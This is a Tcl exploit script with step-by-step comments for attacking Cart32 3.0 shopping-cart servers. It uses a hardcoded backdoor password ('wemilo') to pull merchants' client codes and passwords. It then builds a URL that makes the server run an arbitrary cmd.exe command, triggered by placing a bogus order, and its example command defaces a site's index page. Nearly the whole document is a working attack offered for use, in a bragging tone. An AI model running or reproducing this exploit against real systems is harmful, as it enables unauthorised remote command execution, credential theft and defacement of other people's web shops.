#!/usr/bin/tcl
# [r00tabega.security.labs]
# www.r00tabega.com
# code by futant
# backdoor found by cerberus information security team
# http://www.cerberus-infosec.com {/advcart32.html}

# NOTE: This is terribly easy to exploit but it takes a few minutes
#
# Ok, heres how you do this.
# Go to www.myserver.com/scripts/cart32.exe
# If it says Cart32.exe 3.0, you are probably in luck
#
# Now, go to www.myserver.com/scripts/cart32.exe/cart32clientlist
# This is where the author put a backdoor in. 
# type "wemilo" in the text field and hit the "Go" button
# 
# Find the Client Code (username) that is for the site you are going 
# to hack for example, www.myshophite.com's client code might be MSS 
# or MYSHOP copy and paste the client code and client password into
# notepad/pico/whatever. 
#
# Now run this script. It is a TCL script so therefore requires TCL.
# If you have a UNIX system, skip this part. If you are using windows
# get TCL from http://www.scriptics.com and run it like this:
# Start -> Run -> tclsh83 wemilo.tcl
#
#
# This script will ask your for the hostname you are hacking,
# the client code, and client password.
# 
# Then it will ask you for the command you want to run on the remote
# server.
#
# (Hint: Sometimes IIS will give you the HTML root directory if you 
#  go to http://server.com/whatever.ida .idc, .ida or 
#  /cgi-bin/whatever.pl)
#
# Then this script will write data to an html file on your machine in
# the current directory called wemilo.html. 
# Open this file in netscape or IE and click on the
# link. This will hopefully bring you to a Cart32 WWW page
# that will have tons of shit on it and a text box with your command
# in it. Scroll down to the bottom of the page and click "Save Cart32+ tab"
#
# Now the next order that comes through will run the command you selected.
# Go back to the main page of the site and add some shit to a shopping cart.
# If they accept check/money order fill in bogus crap and then confirm the order.
# your command will then be run.
#
# This DOES work unlike most supposed exploits.
#
#
# (IDK 2k)

package require http

puts "Cart32 exploit helper by futant"
puts "\nEnter the the hostname you wish to hack\nDo NOT include http://"
puts -nonewline "Host: "
flush stdout
set hostname [gets stdin]
puts "\nOk now, type in the Client code that you wish to use.\nYou can get a client code by going to:\nhttp://$hostname/scripts/cart32.exe/Cart32ClientList\nand typing wemilo for the password."
puts -nonewline "Client Code: "
flush stdout
set clientcode [gets stdin]

puts "\nEnter the clients password: (Also obtained from the URL above)"
puts -nonewline "Client Password: "
flush stdout
set clientpassword [gets stdin]

puts "\nNow type the command you want to run on the remote server: "
puts "(example: echo h4x0r3d by futant! > c:\\InetPub\\wwwroot\\index.html )"
puts -nonewline "cmd /c "
flush stdout
set command [gets stdin] 

if {[catch {open wemilo.html w} fid]} {
  puts "ERROR: Couldnt open file for writing, copy and paste this URL.\n"
  set endstring [::http::formatQuery TabName "Cart32+" Action "Save Cart32+ Tab" SaveTab "Cart32+" Client "$clientcode" ClientPassword "$clientpassword" Admin "" AdminPassword "" TabToSave "Cart32+" PlusTabToSave "Run External Program" UseCMDLine "Yes" CMDLine "cmd.exe /c $command"]
  puts "\nYour custom exploit string is:"
  puts "http://$hostname/scripts/c32web.exe?$endstring"
}

set endstring [::http::formatQuery TabName "Cart32+" Action "Save Cart32+ Tab" SaveTab "Cart32+" Client "$clientcode" ClientPassword "$clientpassword" Admin "" AdminPassword "" TabToSave "Cart32+" PlusTabToSave "Run External Program" UseCMDLine "Yes" CMDLine "cmd.exe /c $command"]
puts "\nYour custom exploit string is:"
puts "http://$hostname/scripts/c32web.exe?$endstring"
puts $fid {<HTML>}
puts $fid "<A HREF=\"http://$hostname/scripts/c32web.exe?$endstring\">Click here to hack $hostname</A>"
puts $fid {</HTML>}
close $fid
puts "\nWrote to wemilo.html :]\nExiting..."

# k-rad.